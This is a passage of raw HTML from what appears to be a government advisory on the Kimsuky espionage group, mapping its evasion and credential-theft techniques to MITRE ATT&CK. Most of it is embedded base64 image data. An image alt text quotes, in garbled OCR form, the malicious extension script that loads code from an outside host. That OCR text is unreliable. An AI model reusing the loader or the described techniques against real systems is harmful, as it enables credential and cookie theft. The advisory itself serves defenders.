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” style=”width: 447px; height: 192px;” /></font></font></p>

<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Figure 2: Disabled firewall values in the Registry</em> [<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>41</a>]</p>

<ul>
<li>Kimsuky has used a keylogger that deletes exfiltrated data on disk after it is transmitted to its C2 server (<em>Indicator Removal on Host: File Deletion </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1070/004/”>T1070.004</a>]).[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>42</a>]</li>
<li>Kimsuky has used <code>mshta.exe</code>, which is a utility that executes Microsoft HTAs. It can be used for proxy execution of malicious <code>.hta</code> files and JavaScript or VBS through a trusted windows utility (<em>Signed Binary Proxy Execution: Mshta</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1218/005″>T1218.005</a>]). It can also be used to bypass application allow listing solutions (<em>Abuse Elevation Control Mechanism: Bypass User Access Control</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1548/002″>T1548.002</a>]).[<a href=”https://attack.mitre.org/groups/G0094/”>43</a>],[<a href=”https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/”>44</a>]</li>
<li>Win7Elevate—which was noted above—is also used to evade traditional security measures. Win7Elevatve is a part of the Metasploit framework open-source code and is used to inject malicious code into explorer.exe (<em>Process Injection </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1055″>T1055</a>]). The malicious code decrypts its spying library from resources, saves the decrypted file to disk with a random but hardcoded name in the victim’s temporary folder, and loads the file as a library.[<a href=”https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities”>45</a>],[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>46</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>47</a>]</li>
</ul>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Credential Access</h4>

<p>Kimsuky uses legitimate tools and network sniffers to harvest credentials from web browsers, files, and keyloggers (<em>Credential Access</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0006/”>TA0006</a>]).<font color=”#000000″> </font></p>

<ul>
<li>Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. Kimsuky uses <code>ProcDump</code>, a Windows command line administration tool, also available for Linux, that allows a user to create crash dumps/core dumps of processes based upon certain criteria, such as high central processing unit (CPU) utilization (<em>OS Credential Dumping</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1003/”>T1003</a>]). <code>ProcDump</code> monitors for CPU spikes and generates a crash dump when a value is met; it passes information to a Word document saved on the computer. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky’s inclusion of <code>ProcDump</code> in the BabyShark malware.[<a href=”https://www.microsoft.com/security/blog/2019/05/09/detecting-credential-theft-through-memory-access-modelling-with-microsoft-defender-atp/”>48</a>]</li>
<li>According to open-source security researchers, Kimsuky abuses a Chrome extension to steal passwords and cookies from browsers (<em>Man-in-the-Browser</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1185/”>T1185</a>]).[<a href=”https://attack.mitre.org/groups/G0094/”>49</a>],[<a href=”https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/”>50</a>] The spearphishing email directs a victim to a phishing site, where the victim is shown a benign PDF document but is not able to view it. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named <code>jQuery.js</code>, from a separate site (see figure 3).[<a href=”https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/”>51</a>]</li>
</ul>

<p align=”center” style=”text-align: center; margin-bottom: 8px;”><font color=”#000000″><font face=”Times New Roman”><img alt=”Machine generated alternative text:
var Jqmin — function()
var
, e createHttp();
if (null e)
try
&quot;https : / bizsonet.com/wp-admin/j s/jquery . j s&quot; ,
e. open ( &quot;get&quot; ,
&quot;applicationrx-www-forn-urlencoced&quot;),
e. send()
catch (e)
return
e.responseText
return i
function
Var :
if ( ! e)
var
document. get ElementsByTagName( &quot; s c ript &quot; ) ;
t. length)
(var a O; a t. length; a++)
ttal.id
(e 28)
r document. createäement( &quot;script&quot;);
&quot;text/ javascript&quot;,
r. type
r. id i,
r.src &quot;https://&quot;•øx.bizsonet.cor/wp-adrin/js/jquery-3.3.I.rin.js&quot;,
document . getE1ementsByTagName( &quot; head&quot; ) . appendChi1d (r) ” data-entity-type=”” data-entity-uuid=”” src=”https://us-cert.cisa.govdata:image/png;base64,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